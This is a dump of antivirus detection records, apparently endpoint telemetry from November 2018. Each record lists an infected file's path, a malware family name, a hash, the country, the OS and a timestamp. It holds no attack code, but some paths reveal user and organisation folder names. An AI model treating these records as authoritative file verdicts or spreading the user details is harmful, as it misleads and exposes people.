  Row(detection=Row(filename='avscan-20181102-051636-70acaf21', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051636-70ACAF21', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051602-5c5d0741', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051602-5C5D0741', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051037-9ab719f3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051037-9AB719F3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060356-0ddb6147', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060356-0DDB6147', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052358-7822c4c8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052358-7822C4C8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062654-42dfa96e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062654-42DFA96E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061757-02de2321', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061757-02DE2321', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:17:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053600-267f5b67', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053600-267F5B67', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054511-6f0a0609', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054511-6F0A0609', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:45:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062546-1a62006e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062546-1A62006E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:25:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061938-3f2d22eb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061938-3F2D22EB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:19:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061103-0c75d442', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061103-0C75D442', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052930-3df6d3bb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052930-3DF6D3BB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055558-f0b2e471', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055558-F0B2E471', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050421-bac56953', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050421-BAC56953', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051654-7b85b18f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051654-7B85B18F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:16:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054920-0349d3d5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054920-0349D3D5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:49:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cfp.exe', filepath='K:\\Miracle Team\\Miracle Thunder\\TOOLS\\Blackberry\\cfp\\cfp.exe', filesize=15104000, name='W32/Ramnit.CD.#M1.#R1'), hash='80f33bb99752c444b7b3939da2d7765a5320ca4fd23f4caa4ab6e5b6ba6c6fd9', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Mozilla Firefox\\firefox.exe', parentsize=450512, timestamp='2018-11-02T05:21:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051216-d5c6959b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051216-D5C6959B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053340-d3070106', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053340-D3070106', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050509-d790597d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050509-D790597D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051730-912e6571', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051730-912E6571', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053229-a9011728', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053229-A9011728', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:32:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061513-a15a00ea', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061513-A15A00EA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T02:59:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054315-2a285a40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054315-2A285A40', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052046-059fc3b2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052046-059FC3B2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055756-374a6b17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055756-374A6B17', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053717-54c55ffd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053717-54C55FFD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T07:00:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060526-431bcba8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060526-431BCBA8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T08:21:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061000-e6ea67ff', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061000-E6EA67FF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051446-2f4d4d1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051446-2F4D4D1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050804-3fc801b4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050804-3FC801B4', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051435-290be20b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051435-290BE20B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:14:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052301-564e6608', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052301-564E6608', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:23:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053348-d8347b75', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053348-D8347B75', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060155-c5d34419', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060155-C5D34419', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-13-32-37.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T12:12:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-10-29-09-10-30.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-24T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T08:43:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\PROGRAM FILES\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T00:45:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msmpeg2vdec.dll', filepath='C:\\Windows\\System32\\msmpeg2vdec.dll', filesize=128000, name='HEUR/AGEN.1031535.#M1.#R1'), hash='2c7c4f879074aa1bb1f815a9eb74e18dd090671360634d2c97cee59d652c148b', metadata=Row(cmdline=None, country='PK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:58:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='acara pembakaran.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\BERITA ACARA PEMBAKARAN\\ACARA PEMBAKARAN.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='apar kantin.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\DINI\\DOKUMENTASI\\FOTO APAR KANTIN\\APAR KANTIN.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:22:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c02rm52.htm', filepath='\\\\?\\C:\\Windows.old\\Users\\win7\\AppData\\Local\\VirtualStore\\Program Files (x86)\\Adobe\\PageMaker 7.0\\RSRC\\USENGLSH\\Help\\c02rm52.htm', filesize=384000, name='W32/Chir.B.#M1.#R1'), hash='177d8dae85e091242be9a52657b12d23e7329af9493b951b8c8904782f7a427d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:47:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:01:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T05:47:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155421-b1198a17', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155421-B1198A17', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:54:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:41:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered telet', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered telet', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='22b8fc26575cc8be0f9e6b0c8e672c5835aadc11a06990d6d111d9535096d5f9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:49:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='post benachrichtigungsformular 25.10.2018 514892586.doc', filepath='Post Benachrichtigungsformular 25.10.2018 514892586.doc', filesize=192000, name='W97M/Agent.39570379.#M0.#R0'), hash='2ed2b71c18d4c5af342917fddcad473afe8276e62bc001e6b8660714b132fec7', metadata=Row(cmdline=None, country='CH', os_name='MacOS', os_vmajor='14', os_vminor='5', parentproc=None, parentsize=None, timestamp='2018-11-01T20:42:46Z'), dt=datetime.date(2018, 11, 1)),
